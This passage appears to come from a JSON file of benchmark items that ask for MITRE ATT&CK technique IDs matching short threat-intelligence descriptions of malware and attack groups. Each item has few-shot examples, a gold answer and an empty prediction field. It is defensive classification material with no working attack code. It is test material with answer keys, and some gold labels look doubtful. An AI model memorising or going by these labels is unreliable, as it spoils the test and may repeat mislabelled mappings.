smaller than 1MB.\n\t - T1030: Data Transfer Size Limits\n", + "input": "A variant of Emissary appends junk data to the end of its DLL file to create a large file that may exceed the maximum size that anti-virus programs can scan.", + "gold": "- T1027.001: Obfuscated Files or Information - Binary Padding", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: At this stage the malware disables the Windows screen saver, then changes both the desktop wallpaper and the lock screen images to a custom image. These are the pair of identical JPEG and BMP images presenting the logo of Iran\u2019s Railways and the message similar to the one displayed on the platform boards of different railway stations in Iran\n\t - T1491.001: Defacement - Internal Defacement\n- Text: Following a series of denial-of-service attacks and website defacements, the new destructive malware corrupts the master boot record (MBR), partition and file system of all available physical drives on Windows machines\n\t - T1561.002: Disk Wipe - Disk Structure Wipe\n- Text: Shamoon attempts to overwrite operating system files and disk structures with image files. In a later variant, randomly generated data was used for data overwrites.\n\t - T1485: Data Destruction\n", + "input": "Lazarus Group replaced the background wallpaper of systems with a threatening image after rendering the system unbootable with a Disk Structure Wipe.", + "gold": "- T1491.001: Defacement - Internal Defacement", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cobalt Strike can recover hashed passwords.\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n- Text: This module intercepts HWP documents on an infected computer. The HWP file format is similar to Microsoft Word documents, but supported by Hangul, a South Korean word processing application from the Hancom Office bundle. This malware module works independently of the others and maintains its own Bulgarian e-mail account. The account is hardcoded in the module along with the master\u2019s e-mail to which it sends intercepted documents. It is interesting that the module does not search for all the HWP files on infected computer, but reacts only to those that are opened by the user and steals them. This behavior is very unusual for a document-stealing component and we do not see it in other malicious toolkits\n\t - T1005: Data from Local System\n- Text: Leafminer used several tools for retrieving login and password information, including LaZagne and Mimikatz.\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n", + "input": "GALLIUM collected data from the victim's local system, including password hashes from the SAM hive in the Registry.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has 2 methods for elevating integrity. It can bypass UAC through eventvwr.exe and sdclt.exe.\n\t - T1548.002: Abuse Elevation Control Mechanism - Bypass User Account Control\n- Text: Several files are created by Carbon to keep logs, tasks to execute and configuration that will modify the malware\u2019s behavior\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: the filename changed from tru.dll to kibuyuink.exe, even though it remained a DLL and still required regsvr32.exe to run. Changing the filename extension is a common tactic seen in various malware infections.\n\t - T1587.001: Develop Capabilities - Malware\n\t - T1546.001: Event Triggered Execution - Change Default File Association\n", + "input": "CSPY Downloader can use the schtasks utility to bypass UAC.", + "gold": "- T1053.005: Scheduled Task/Job - Scheduled Task", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This file is written to the following file path: % TEMP%\\Update.~tmp After the file is written, it is then copied to a filename of \u2019winhelp.cpl\u2019 in the directory that was initially chosen\n\t - T1070.006: Indicator Removal - Timestomp\n\t - T1036: Masquerading\n\t - T1074: Data Staged\n- Text: Ke3chang has gained access through VPNs including with compromised accounts and stolen VPN certificates.\n\t - T1133: External Remote Services\n- Text: Tomiris has connected to a signalization server that provides a URL and port, and then Tomiris sends a GET request to that URL to establish C2.\n\t - T1568: Dynamic Resolution\n", + "input": "APT29 has set the hostnames of its C2 infrastructure to match legitimate hostnames in the victim environment. They have also used IP addresses originating from the same country as the victim for their VPN infrastructure.", + "gold": "- T1036: Masquerading", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ROKRAT has been delivered via spearphishing emails that contain a malicious Hangul Office or Microsoft Word document.\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: KOCTOPUS has been distributed as a malicious link within an email.\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: DanBot has relied on victims' opening a malicious file for initial execution.\n\t - T1204.002: User Execution - Malicious File\n", + "input": "During Operation Spalax, the threat actors sent phishing emails that included a PDF document that in some cases led to the download and execution of malware.", + "gold": "- T1566.001: Phishing - Spearphishing Attachment", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Ferocious Kitten has attempted to convince victims to enable malicious content within a spearphishing email by including an odd decoy message.\n\t - T1204.002: User Execution - Malicious File\n- Text: Flagpro can execute malicious VBA macros embedded in .xlsm files.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: Gamaredon Group has used DOCX files to download malicious DOT document templates and has used RTF template injection to download malicious payloads. Gamaredon Group can also inject malicious macros or remote templates into documents already present on compromised systems.\n\t - T1221: Template Injection\n", + "input": "APT-C-36 has embedded a VBScript within a malicious Word document which is executed upon the document opening.", + "gold": "- T1059.005: Command and Scripting Interpreter - Visual Basic", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Bumblebee can use multiple Native APIs.\n\t - T1106: Native API\n- Text: PLATINUM is capable of using Windows hook interfaces for information gathering such as credential access.\n\t - T1056.004: Input Capture - Credential API Hooking\n- Text: Pteranodon can use a dynamic Windows hashing algorithm to map API components.\n\t - T1027.007: Obfuscated Files or Information - Dynamic API Resolution\n", + "input": "Pony has used several Windows functions for various purposes.", + "gold": "- T1106: Native API", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: 2. The macro decodes the dropped files using Windows certutil.exe (certutil.exe is a legitimate built-in command-line program to manage certificates in Windows). 3. The macro creates a copy of the files with their proper extensions using Extensible Storage Engine Utilities (esentutil.exe) (esentutil.exe is also a legitimate program that is pre-installed in Windows). The dropped files include the following: GUP.exe : GUP, a free (LGPL) Generic Updater. GUP is an open source binary used by Notepad++ for software updates\n\t - T1055.012: Process Injection - Process Hollowing\n\t - T1106: Native API\n\t - T1036: Masquerading\n\t - T1010: Application Window Discovery\n- Text: ShimRatReporter spoofed itself as \"AlphaZawgyl_font.exe\", a specialized Unicode font.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: BONDUPDATER uses \"-windowstyle hidden\" to conceal a PowerShell window that downloads a payload.\n\t - T1564.003: Hide Artifacts - Hidden Window\n", + "input": "Machete saves the window names.", + "gold": "- T1010: Application Window Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The ransomware payload is copied to an Active Directory Domain Controller and deployed to systems using the Default Domain Group Policy Object\n\t - T1570: Lateral Tool Transfer\n- Text: Deep Panda uses net.exe to connect to network shares using \"net use\" commands with compromised credentials.\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n- Text: Empire can find shared drives on the local system.\n\t - T1135: Network Share Discovery\n", + "input": "During Operation Wocao, threat actors used SMB to copy files to and from target systems.", + "gold": "- T1570: Lateral Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: InvisiMole uses a variation of the XOR cipher to encrypt files before exfiltration.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n- Text: uses the Invoke-Obfuscation framework to obfuscate their PowerShell and also performs other code obfuscation.\n\t - T1027: Obfuscated Files or Information\n- Text: Dridex has encrypted traffic with RC4.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", + "input": "FoggyWeb can use a dynamic XOR key and a custom XOR methodology to encode data before exfiltration. Also, FoggyWeb can encode C2 command output within a legitimate WebP file.", + "gold": "- T1560.003: Archive Collected Data - Archive via Custom Method", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: It mimics the icon Finder usually applies to JPEG or text files to increase the likelihood the recipient will double-click the file\n\t - T1083: File and Directory Discovery\n- Text: Conti can enumerate remote open SMB network shares using \"NetShareEnum()\".\n\t - T1135: Network Share Discovery\n- Text: Operation Wocao has discovered removable disks attached to a system.\n\t - T1120: Peripheral Device Discovery\n", + "input": "ZLib has the ability to enumerate files and drives.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: No matching sample found for T1562.003\n- Text: Cobalt Strike can use \"sudo\" to run a command.\n\t - T1548.003: Abuse Elevation Control Mechanism - Sudo and Sudo Caching\n- Text: PyDCrypt has used `cmd.exe` for execution.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", + "input": "Cobalt Strike's Beacon payload is capable of running shell commands without \"cmd.exe\" and PowerShell commands without \"powershell.exe\"", + "gold": "- T1106: Native API", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: 1) Using the compromised SolarWinds DLL to activate a backdoor that enables attackers to remotely control and operate on a device 2) Using the backdoor access to steal credentials, escalate privileges, and move laterally to gain the ability to create valid SAML tokens using any of two methods: Stealing the SAML signing certificate (Path 1) Adding to or modifying existing federation trust (Path 2) 3) Stealing the SAML signing certificate (Path 1) 4) Adding to or modifying existing federation trust (Path 2) 5) Using attacker-created SAML tokens to access cloud resources and perform actions leading to the exfiltration of emails and persistence in the cloud\n\t - T1047: Windows Management Instrumentation\n- Text: UNC2452 used \"cmd.exe\" to execute commands on remote machines.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: We found a Coinminer bundled with the legitimate installer of video conferencing app Zoom, luring users who want to install the software but end up unwittingly downloading a malicious file. The compromised files are not from Zoom\u2019s official download center, and are assumed to come from fraudulent websites. We have been working with Zoom to ensure that they are able to communicate this to their users appropriately.\n\t - T1588.001: Obtain Capabilities - Malware\n\t - T1554: Compromise Host Software Binary\n\t - T1195.002: Supply Chain Compromise - Compromise Software Supply Chain\n\t - T1574.005: Hijack Execution Flow - Executable Installer File Permissions Weakness\n", + "input": "During FunnyDream, the threat actors used `wmiexec.vbs` to run remote commands.", + "gold": "- T1047: Windows Management Instrumentation", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FIN8 has used scheduled tasks to maintain RDP backdoors.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: UNC2452 named tasks \"\\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager\" in order to appear legitimate.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: Nebulae can create a service to establish persistence.\n\t - T1543.003: Create or Modify System Process - Windows Service\n", + "input": "Matryoshka can establish persistence by adding a Scheduled Task named \"Microsoft Boost Kernel Optimization\".", + "gold": "- T1053.005: Scheduled Task/Job - Scheduled Task", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Capable of stealing documents sent to the printer queue. Steals written CD images. Capable of stealing files previously seen on removable drives once they are available again. Steals Internet Explorer, Netscape Navigator, FireFox and RealNetworks cookies. If deleted from Frontend file or related registry values, it will reappear after reboot with a new name and startup type\n\t - T1025: Data from Removable Media\n- Text: BlackEnergy can gather very specific information about attached USB devices, to include device instance ID and drive geometry.\n\t - T1120: Peripheral Device Discovery\n- Text: USBStealer exfiltrates collected files via removable media from air-gapped victims.\n\t - T1052.001: Exfiltration Over Physical Medium - Exfiltration over USB\n", + "input": "Machete can find, encrypt, and upload files from fixed and removable drives.", + "gold": "- T1025: Data from Removable Media", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Machete has used pyobfuscate, zlib compression, and base64 encoding for obfuscation. Machete has also used some visual obfuscation techniques by naming variables as combinations of letters to hinder analysis.\n\t - T1027: Obfuscated Files or Information\n- Text: Clop has used a simple XOR operation to decrypt strings.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: The string \u201cfjzmpcjvqp\u201d is unique and not something likely to be present if the code was not generated with the same public POC exploit code\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1027.001: Obfuscated Files or Information - Binary Padding\n", + "input": "The WastedLocker payload includes encrypted strings stored within the .bss section of the binary file.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PoisonIvy creates run key Registry entries pointing to a malicious executable dropped to disk.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: The malware creates a shortcut %APPDATA%\\dotNET.lnk pointing to the copy of the malware under %APPDATA%.\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- Text: Tropic Trooper has created the Registry key \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell\" and sets the value to establish persistence.\n\t - T1547.004: Boot or Logon Autostart Execution - Winlogon Helper DLL\n", + "input": "LiteDuke can create persistence by adding a shortcut in the \"CurrentVersion\\Run\" Registry key.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In addition, PLAINTEE will create a unique GUID via a call to CoCreateGuid() to be used as an identifier for the victim. The malware then proceeds to collect general system enumeration data about the infected machine and enters a loop where it will decode an embedded config blob and send an initial beacon to the C2 server. The first byte of the string is used as the XOR key to in turn decode the remainder of the data\n\t - T1082: System Information Discovery\n- Text: APT37 has a Bluetooth device harvester, which uses Windows Bluetooth APIs to find information on connected Bluetooth devices.\n\t - T1120: Peripheral Device Discovery\n- Text: Tonto Team has used tools such as NBTscan to enumerate network shares.\n\t - T1135: Network Share Discovery\n", + "input": "Operation Wocao has discovered the local disks attached to the system and their hardware information including manufacturer and model, as well as the OS versions of systems connected to a targeted network.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: No matching sample found for T1602.002\n- Text: Motherboard Check The Trojan will perform the following WMI query: Select * from Win32_BaseBoard The Trojan will check the Manufacturer and Product fields in the results for the strings VMware, Virtual, VBox, VM or Oracle\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n\t - T1497: Virtualization/Sandbox Evasion\n- Text: Lazarus Group has used a custom hashing method to resolve APIs used in shellcode.\n\t - T1027.007: Obfuscated Files or Information - Dynamic API Resolution\n", + "input": "Bumblebee can search for tools used in static analysis.", + "gold": "- T1622: Debugger Evasion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The software installed on the compromised computer is of particular interest. Which programs are installed on the system. Which of them are executed automatically at each system start or user logon. Which programs are used by a particular user. If the attackers are interested, they are only one command away from these valuable data\n\t - T1518: Software Discovery\n- Text: Ke3chang has used compromised credentials and a .NET tool to dump data from Microsoft Exchange mailboxes.\n\t - T1114.002: Email Collection - Remote Email Collection\n- Text: Once inside the network of a hospitality company, APT28 sought out machines that controlled both guest and internal Wi-Fi networks. No guest credentials were observed being stolen at the compromised hotels; however, in a separate incident that occurred in Fall 2016, APT28 gained initial access to a victim\u2019s network via credentials likely stolen from a hotel Wi-Fi network. Upon gaining access to the machines connected to corporate and guest Wi-Fi networks, APT28 deployed Responder\n\t - T1018: Remote System Discovery\n", + "input": "HAFNIUM gathered the fully qualified domain names (FQDNs) for targeted Exchange servers in the victim's environment.", + "gold": "- T1590: Gather Victim Network Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: DarkComet can collect the computer name, RAM used, and operating system version from the victim\u2019s machine.\n\t - T1082: System Information Discovery\n- Text: InvisiMole has used ListPlanting to inject code into a trusted process.\n\t - T1055.015: Process Injection - ListPlanting\n- Text: gathers the MAC address of the victim\u2019s machine.\n\t - T1016: System Network Configuration Discovery\n", + "input": "BADFLICK has captured victim computer name, memory space, and CPU details.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Dridex has used the \"OutputDebugStringW\" function to avoid malware analysis as part of its anti-debugging technique.\n\t - T1106: Native API\n- Text: Clambling can wait 30 minutes before initiating contact with C2.\n\t - T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion\n- Text: The macro then creates a scheduled task named SecurityAssist that runs after waiting one minute. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. The Trojan extracts and loads this embedded assembly by concatenating the contents of two resources named S1 and S2 and decompresses the resulting data using the GZipSteam class. The resulting Interop.SHDocVw .NET assembly is packed with SmartAssembly and further obfuscated using Confuser v1.9.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. hex(Environment.UserName/Environment.MachineName)> The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run. The C2 server will respond to the Trojan\u2019s request by echoing the value <hex(Environment.UserName/Environment.MachineName)> if it wishes to provide additional commands. If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what commands the C2 wishes to run by issuing a request to the following URL: http://<c2 domain>/what. hex(Environment.UserName/Environment.MachineName)> After issuing the what command, the Trojan will parse the C2's response for the string Oops, which the Trojan will treat as the C2 making a mistake and will exit. Otherwise, the Server will respond with a command followed by a set of parameters, split up by the delimiter <>: [command]<>[parameters for command in hexadecimal format] The available commands are\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", + "input": "Bisonal has launched cmd.exe and used the ShellExecuteW() API function to execute commands on the system.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PsExec, a tool that has been used by adversaries, writes programs to the \"ADMIN$\" network share to execute commands on remote systems.\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n- Text: Kwampirs collects a list of network shares with the command \"net share\".\n\t - T1135: Network Share Discovery\n- Text: HyperStack uses named pipes to execute remote procedure calls (RPC) from the controller to the device hosting the HyperStack client. To move laterally, the implant tries to connect to another remote device\u2019s IPC$ share, either using a null session or default credentials. IPC$ is a share that facilitates inter-process communication (IPC) by exposing named pipes to write to or read from. If the implant\u2019s connection to the IPC$ is successful, the implant can forward RPC commands from the controller to the remote device, and likely has the capability to copy itself onto the remote device\n\t - T1559: Inter-Process Communication\n\t - T1078.001: Valid Accounts - Default Accounts\n", + "input": "HermeticWizard can connect to remote shares using `WNetAddConnection2W`.", + "gold": "- T1106: Native API", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: manipulated .lnk files to gather user credentials in conjunction with .\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- Text: Emotet is an advanced, modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. Additionally, Emotet is a polymorphic banking Trojan that can evade typical signature-based detection. It has several methods for maintaining persistence, including auto-start registry keys and services. Furthermore, Emotet is Virtual Machine-aware and can generate false indicators if run in a virtual environment\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: To load the driver, a new service is created using the API CreateServiceW. The name and display name for this service is the 4-character name used for the file name. Next, StartServiceW is called in a loop five times to ensure the driver is loaded. Immediately after the driver is loaded, the service is removed by deleting the entire registry key\n\t - T1106: Native API\n\t - T1543.003: Create or Modify System Process - Windows Service\n", + "input": "A version of KONNI drops a Windows shortcut on the victim\u2019s machine to establish persistence.", + "gold": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Epic compresses the collected data with bzip2 before sending it to the C2 server.\n\t - T1560.002: Archive Collected Data - Archive via Library\n- Text: Elise exfiltrates data using cookie values that are Base64-encoded.\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: Earlier versions of UPPERCUT used the hard-coded string \u201cthis is the encrypt key\u201d for Blowfish encryption when communicating with a C2. However, in the latest version, the keys are hard-coded uniquely for each C2 address and use the C2\u2019s calculated MD5 hash to determine which key to use, as shown in Figure 10\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", + "input": "Cardinal RAT applies compression to C2 traffic using the ZLIB library.", + "gold": "- T1560.002: Archive 